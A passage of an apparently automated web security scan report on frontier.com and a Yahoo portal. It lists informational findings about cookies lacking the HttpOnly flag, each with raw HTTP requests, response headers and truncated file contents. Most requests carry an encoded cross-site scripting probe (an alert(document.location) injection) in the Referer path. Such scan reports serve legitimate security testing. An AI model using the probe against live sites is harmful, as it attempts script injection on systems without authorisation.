Host:   http://frontier.com
Path:   /AgentOrdering/javascripts/validateinteger.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AgentOrdering/javascripts/validateinteger.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8823CMWWU; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 220
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:04 GMT

function Int_Function(theItem) {
   num_test = /\d/;
   for (i=0;i<theItem.value.length;i++) {
       if (!(num_test.test(theItem.value.charAt(i)))) {
           theItem.value = theItem.value.substring(0,i);
           r
...[SNIP]...

10.56. http://frontier.com/Controls/VirtualCode.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Controls/VirtualCode.ashx?pageid=97&origPath=%2fNewStyleSheet.css%2f HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8824CMWUL; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Date: Tue, 06 Sep 2011 12:03:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=55lskvumgowh0r45t52u43vf; path=/; HttpOnly
Cache-Control: public
Expires: Tue, 06 Sep 2011 12:14:22 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 22788

#iframeDiv {

}

#iframeDiv iframe {
width: 900px;
height: 1000px;
border: none;
overflow: auto;
}

body
{
MARGIN-TOP: 0px;
MARGIN-LEFT: 0px;
CO
...[SNIP]...

10.57. http://frontier.com/Js/formHelpers.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Js/formHelpers.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Js/formHelpers.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8823CMWWU; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 7911
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Jul 2011 16:59:13 GMT
Accept-Ranges: bytes
ETag: "806da59fe46cc1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:04 GMT

var screenX=0;
var screenY=0;
document.onmousedown=getMouseXY;


function getMouseXY(e){
   if(document.all) e=event;
   screenX=e.screenX;
   screenY=e.screenY;
}
function fixDecimal(fld){
   va
...[SNIP]...

10.58. http://frontier.com/Js/jQuery/jquery-1.4.4.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Js/jQuery/jquery-1.4.4.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Js/jQuery/jquery-1.4.4.min.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8826CMWWL; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 78768
Content-Type: application/x-javascript
Last-Modified: Fri, 17 Jun 2011 17:54:21 GMT
Accept-Ranges: bytes
ETag: "804f195172dcc1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:07 GMT

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...

10.59. http://frontier.com/Js/jQuery/jquery.maskedinput.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Js/jQuery/jquery.maskedinput.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Js/jQuery/jquery.maskedinput.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8824CMWWW; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 3548
Content-Type: application/x-javascript
Last-Modified: Mon, 22 Nov 2010 19:43:08 GMT
Accept-Ranges: bytes
ETag: "0eed37c7d8acb1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:06 GMT

.../*
   Masked Input plugin for jQuery
   Copyright (c) 2007-2009 Josh Bush (digitalbush.com)
   Licensed under the MIT license (http://digitalbush.com/projects/masked-input-plugin/#license)
   Version:
...[SNIP]...

10.60. http://frontier.com/Js/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Js/s_code.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Js/s_code.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 29119
Content-Type: application/x-javascript
Last-Modified: Thu, 05 May 2011 05:01:12 GMT
Accept-Ranges: bytes
ETag: "8cabb274e1acc1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:53 GMT

/* SiteCatalyst code version: H.22.1.
Copyright 1996-2011 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */

/* Specify the Report Suite ID(s) to track here */
//d
...[SNIP]...

10.61. http://frontier.com/Resources/3rdParty/HBX/hbx.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/HBX/hbx.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Resources/3rdParty/HBX/hbx.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8825CMWWK; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 16427
Content-Type: application/x-javascript
Last-Modified: Mon, 22 Nov 2010 21:06:52 GMT
Accept-Ranges: bytes
ETag: "07e5d2f898acb1:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:52 GMT

//hbx.js,HBX2.5,Copyright 1997 - 2008. Omniture, Inc. All Rights Reserved. Omniture is a registered trademark of Omniture, Inc. in the United States, Canada, Japan, and the European Community.
/* IN
...[SNIP]...

10.62. http://frontier.com/Resources/3rdParty/JQuery/jq.client.plugin.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/JQuery/jq.client.plugin.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Resources/3rdParty/JQuery/jq.client.plugin.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8826CMWWM; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 2858
Content-Type: application/x-javascript
Last-Modified: Mon, 28 Feb 2011 13:38:16 GMT
Accept-Ranges: bytes
ETag: "054a9c04cd7cb1:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:52 GMT

(function() {
   
   var BrowserDetect = {
       init: function () {
           this.browser = this.searchString(this.dataBrowser) || "An unknown browser";
           this.version = this.searchVersion(navigator.userAgen
...[SNIP]...

10.63. http://frontier.com/Resources/3rdParty/JQuery/jquery-1.4.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/JQuery/jquery-1.4.2.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Resources/3rdParty/JQuery/jquery-1.4.2.min.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8825CMWWY; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 72328
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Nov 2010 17:34:16 GMT
Accept-Ranges: bytes
ETag: "0dc10d48f82cb1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:07 GMT

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...

10.64. http://frontier.com/Resources/3rdParty/JQuery/jquery-jtemplates.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/JQuery/jquery-jtemplates.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Resources/3rdParty/JQuery/jquery-jtemplates.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8824CMWUL; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 9709
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Nov 2010 17:34:16 GMT
Accept-Ranges: bytes
ETag: "0dc10d48f82cb1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:52 GMT

/* jTemplates 0.7.8 (http://jtemplates.tpython.com) Copyright (c) 2009 Tomasz Gloc */
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.
...[SNIP]...

10.65. http://frontier.com/Resources/3rdParty/JQuery/jquery-ui.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/JQuery/jquery-ui.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Resources/3rdParty/JQuery/jquery-ui.min.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8827CMWYI; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 196163
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Nov 2010 17:34:16 GMT
Accept-Ranges: bytes
ETag: "0dc10d48f82cb1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:08 GMT

/*!
* jQuery UI 1.8.5
*
* Copyright 2010, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* http://docs.jqu
...[SNIP]...

10.66. http://frontier.com/Resources/3rdParty/JQuery/jquery.json-2.2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Resources/3rdParty/JQuery/jquery.json-2.2.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Resources/3rdParty/JQuery/jquery.json-2.2.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8824CMWUL; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 5769
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Nov 2010 17:34:16 GMT
Accept-Ranges: bytes
ETag: "0dc10d48f82cb1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:52 GMT

/*
* jQuery JSON Plugin
* version: 2.1 (2009-08-14)
*
* This document is licensed as free software under the terms of the
* MIT License: http://www.opensource.org/licenses/mit-license.php

...[SNIP]...

10.67. http://frontier.com/images/FTRMain/frontier_Logo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /images/FTRMain/frontier_Logo.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/FTRMain/frontier_Logo.jpg HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8827CMWYI; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 4184
Content-Type: image/jpeg
Last-Modified: Mon, 25 Jul 2011 16:24:14 GMT
Accept-Ranges: bytes
ETag: "7023584be74acc1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:09 GMT

......JFIF.....H.H.....C...........    ...    .......

.

........................... ...C.............. ......3...................................
...[SNIP]...

10.68. http://frontier.com/images/FTRMain/gradientBox.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /images/FTRMain/gradientBox.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/FTRMain/gradientBox.png HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8827CMWWM; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 35375
Content-Type: image/png
Last-Modified: Thu, 12 May 2011 10:59:50 GMT
Accept-Ranges: bytes
ETag: "6227d5b69310cc1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:55 GMT

.PNG
.
...IHDR.............I..H...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

10.69. http://frontier.com/images/FTRMain/small_arrow.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /images/FTRMain/small_arrow.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/FTRMain/small_arrow.png HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8827CMWYI; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 168
Content-Type: image/png
Last-Modified: Mon, 25 Jul 2011 16:24:14 GMT
Accept-Ranges: bytes
ETag: "24e85c4be74acc1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:08 GMT

.PNG
.
...IHDR.............B.%}....tEXtSoftware.Adobe ImageReadyq.e<...JIDATx.bdh\P...........`.........$..g...    H...t...Q$..=..8F..F..4...i@.@...?..Uy.......IEND.B`.

10.70. http://frontier.com/images/icon_print.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /images/icon_print.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icon_print.gif HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8827CMWWO; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 107
Content-Type: image/gif
Last-Modified: Thu, 05 Apr 2007 14:26:24 GMT
Accept-Ranges: bytes
ETag: "603f7b638e77c71:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:53 GMT

GIF89a.............fff333!.......,........@.<...6....J.9$.w.diS.)...*.)......"@....xY..P8."skmp.....:..E..;

10.71. http://frontier.com/js/jquery/jquery.numeric.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /js/jquery/jquery.numeric.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery/jquery.numeric.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Content-Length: 3790
Content-Type: application/x-javascript
Last-Modified: Thu, 29 Jul 2010 19:17:28 GMT
Accept-Ranges: bytes
ETag: "094ffae522fcb1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:53 GMT

/*
*
* Copyright (c) 2006/2007 Sam Collett (http://www.texotela.co.uk)
* Licensed under the MIT License:
* http://www.opensource.org/licenses/mit-license.php
*
* Version 1.0
* Demo: htt
...[SNIP]...

10.72. http://frontier.my.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.my.yahoo.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: frontier.my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:47 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6ImVpMDhxY2Q3NXZjNGQiO3M6MjoibXQiO2k6MTMxNTMxMjE4Nzt9; expires=Fri, 06-Sep-2013 12:29:47 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:29:47 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MYFMP_Sacfea3=d=7142216504e66123b932767.54181906&s=6JRSdtjl3lb3w.8KyXWmOA--; expires=Mon, 05-Sep-2011 12:29:47 GMT; path=/; domain=frontier.my.yahoo.com; httponly
Set-Cookie: MYTMI=4; expires=Wed, 05-Sep-2012 12:29:47 GMT; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 171806

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html class="ua-wk ua-win">
<head>
<script>var gTop = Number(new Date());</script> <script> </s
...[SNIP]...

10.73. http://frontier.my.yahoo.com/e/js  previous  next
